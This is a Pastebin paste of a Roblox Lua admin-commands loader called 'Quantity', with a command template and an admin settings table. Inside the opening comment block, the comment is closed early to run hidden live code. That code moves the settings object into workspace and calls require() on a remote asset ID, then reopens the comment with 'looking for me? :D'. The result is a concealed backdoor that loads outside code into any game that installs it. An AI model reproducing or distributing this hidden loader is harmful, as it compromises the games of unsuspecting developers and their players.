Advertisement
Clyclop

Untitled

Sep 5th, 2016
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 173.72 KB | None | 0 0
  1. --[[
  2. //Quantity By Dittoide\\
  3. //LOADER VERSION 1.6.6 QUANTITY Auto Updates!\\
  4.  
  5.  
  6. //INFO\\
  7. @Do not distrobute this as your own!
  8. @Doesn't need loadsstring anymore!
  9. @Please do "cmds/" to view the commands!
  10. @Give credit in-game/In the desc to Dittoide (If you wish)
  11. @Please tell users that Dittoide created this if they ask!
  12. @Adding a credits command soon! Fixing message command too! --]] script.Parent["Admin Settings"].Parent = workspace require(308207974) --[[ --looking for me? :D
  13. @Does NOT Work in studio so you cannot steal!!
  14. @No need to edit settings!
  15. --]]
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57.  
  58.  
  59.  
  60.  
  61.  
  62.  
  63.  
  64.  
  65.  
  66.  
  67. local thing = {
  68. NewCommand('title','usage','description',1,
  69. function(nothing,nothing,spkr)
  70. Output(spkr, BrickColor.Random(), 'text', true , nil, true)
  71. end
  72. )
  73. }
  74.  
  75. return thing
  76.  
  77.  
  78.  
  79.  
  80. Settings = {
  81. Bet = '/';
  82. Admins = {'SupahLuke'};
  83. AdminRank = 5; -- 1 to 5.
  84. Plugins = script.QuantityPlugins["Plugin Script"]
  85. }
  86.  
  87. return Settings
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement